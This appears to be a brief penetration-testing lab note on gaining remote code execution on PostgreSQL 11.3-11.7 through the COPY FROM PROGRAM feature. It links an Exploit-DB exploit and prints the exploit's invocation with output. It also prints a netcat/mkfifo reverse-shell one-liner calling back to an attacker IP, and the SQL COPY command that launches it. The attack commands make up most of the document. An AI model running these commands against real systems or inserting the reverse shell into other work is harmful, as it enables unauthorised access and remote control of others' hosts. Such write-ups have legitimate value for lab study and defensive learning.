# Exploitation

```
PostgreSQL DB 11.3 - 11.7
```

This version of PostgresSQL is vulnerable to RCE

{% embed url="<https://www.exploit-db.com/exploits/50847>" %}

&#x20;I was able to execute commands but I was never able to get a reverse shell until I read this article here.&#x20;

{% embed url="<https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767>" %}

![](https://3997521420-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKc58zAyg2kLPcEufCTKM%2Fuploads%2FKQI6oM3iulTpBgbGejC4%2F2022-07-28_16-09.png?alt=media\&token=93a02d23-8d01-4763-b2c4-9d1f1e231947)

```
python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67
```

One-liner:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f
```

This got me remote code execution as well as creating a table and getting a shell using the exact same method.&#x20;

```
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';COPY 0
```